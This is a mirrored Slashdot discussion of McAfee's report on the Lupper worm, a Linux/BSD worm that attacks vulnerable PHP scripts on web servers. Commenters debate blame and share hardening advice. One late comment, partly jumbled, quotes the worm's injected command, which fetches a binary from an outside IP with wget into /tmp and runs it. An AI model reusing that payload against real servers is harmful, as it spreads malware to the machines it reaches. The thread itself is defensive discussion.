Slashdot Mirror
Linux Lupper.Worm In the WIld
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
Seems kind of wrong to name it exclusively a linux problem.
Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!
...then it's a PHP/*nix worm, not Linux specifically.
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
...Linux is more and more popular with corporations holding valuable and important data.
;)
Success is a double-edged sword.
Loading...
"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?
More alarmist shit (and old news at tht - The Reg reported this last week).
Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.
The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
In the distros I've used, the user has to explicitely choose to have a web server installed. Even after that, the user's probably going to have to explicitely choose to install PHP.
"...today consumers have been conditioned to think of beer when they see a bullfrog..."
Well, actually, yes. Seeing as no Linux distibution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.
Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
That's funny, and a typical slashdot experience. Someone bashes M$ when something that could even be remotely construed as critical of Linux, and then someone like me points out the hypocrisy of their post, and get modded as a troll. LOL. Next thing you know it will be modded 'Nazi'. Standard slashdot/internet model.
Loading...
Your damn right it's the system admin's fault. Because the worm can only get in if your linux server "is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed". Not like you couldn't fuck a windows server the same way. ...upload - FuckYou.bat ...execute - www.dumbass.com/UnsecureDir/FuckYou.bat
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.
Bradley Holt
Well, firstly, I doubt this worm will be particularly widespread - the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address. Obviously some systems (with the very outdated versions of the vulnerable programs) will be vulnerable. But this isn't really the point of what I'm thinking about.
/tmp (and anything else writeable by the script) no-exec (although there are ways around this, it will defeat many skript kiddies).
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more agressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc). you can make it so the web server needs to have no egress *at all* except via the services on the other xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
Oolite: Elite-like game. For Mac, Linux and Windows
The key word is "attempts".
Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?
The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.
Now:
In other words, nothing to see here but more antivirus vendor fud.
Let's look at this logically.
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
This is not a flaw in Linux. It is a vulnerability in a script written in PHP that a sysadmin may install on a Linux box.
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.That's what you believe. Yet my bank example shows that popularity has nothing to do with security.That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
Would you accept the same excuse for IIS?
FTA I don't see where it a linux worm, or even an appache worm it's primarily attacking php scripts even then it's only capable of attacking php scripts in servers that are configured to allow 2 very well known security configuration flaws and one that's recomemded against. NOTE the windows ME-XP instructions on the page.
Apocalypse Cancelled, Sorry, No Ticket Refunds
er, where exactly do you think these "attempts" are coming from? It's been classified as a worm for a reason.
it was mis-classified as a "linux" worm, even though it has zero to do with linux. It's a bug in several php 3rd-party scripts, it was fixed months ago, and today is Troll Tuesday, and the editors are messing with your heads.
sure, if I want I could set a box up to partake in the fun (get an older distro, make sure it has the right files, and put it on the net ... and wait pretty much forever for it to get wormed. It's not that prevailent, it's not that capable of propagating itself (there aren't that many vulnerable hosts out there), yadda yadda yadda ...
Remember, symantec and Mcafee and the rest are looking at their market pretty much disappearing over the next 2 years. Microsoft is going to be selling their own anti-virus, and most people will go with that as a default, even if there are much better products out there.
It's the same situation with firefox and openoffice - both much better products than Internet Exploder and Word, but people stick with what they've got because they're lazy and/or stupid and/or timid and/or its "good enough".
So just who are the antivirus vendors going to sell to in the future? Its not like you need any special tools to clean up a unix box with a bad script - last I looked, vi and/or rm came with every system. As for bad binaries, well, unlike certain OTHER systems, we have the source ... we're not dependent on vendors for patching binaries, nor on antivirus vendors for "cleaning" infected binaries.
So, again, the antivirus vendors are looking at a diminishing market base over the next few years. Time for them to start hiring some black hats and creating as many worms as they can.
So, something is hunting for vulnerable scripts (no big shock), but it seems far from rampant.
on the other hand, a friend of mine runs a multi-hosting site with a couple of hundred customers, and we've had to do multiple sweeps for people running out of date scritpts with holes in them that have been exploited (and then had to hunt down and clean up the resulting exploitation). Some of the customers respond to our warning messages. Others ignore the warnings and just blindly re-enable the broken scripts.
These are definitely user issues, not Linux issues. If you install and run a program you really are responsible for making sure that it's safe. Beyond a certain point, the OS can't protect you from your own stupidity.
On the other hand, if the exploit then finds a local root exploit, then I'd call that a Linux problem.
As far as I'm concerned, the distributor is responsible for holes in a default installation -- Those are often done by newbies who may not even know that a vulnerable service is running on his/her box (or even what a service is).
When you start installing add-on programs and remote scripts, their default forms are pretty much the responsibility of the people who make them available (modulo any explicit warnings they give an installer). The user, however is ultimately responsible for what he adds to his system.
Free Software: Like love, it grows best when given away.
Security is independant of popularity.
There is nothing about popularity that makes a system more or less secure.No.No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.Because their security is not perfect.Now you're confusing "risk" with "security".
The two are not the same.
Security != Popularity
Security != RiskRead "Attack Trees" by Bruce Schneier.
http://www.schneier.com/paper-attacktrees-ddj-ft.
Security is all about reducing the avenues of attack.
If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.
If X is rare, few felons will have the expertise to attack it.
If X is rare, few felons will have the motivation to attack it.
Conversely, if X is widespread, and hated among felons, it will be an attractive target.
If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.
The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quicly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.
So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.
Sorry -- it would be nice if the world were so simple.
step one go to securityfocus and update all of the applications listed on your system. /tmp/lupii /tmp/lupii" su -c"touch tmp/lupii"
/tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
Symptoms
Presence of the following file:
*
One of the following ports are listening:
* UDP 7111
* UDP 7222
so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm
the worm appearent does this
echo '_begin_';echo `cd
so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.
Apocalypse Cancelled, Sorry, No Ticket Refunds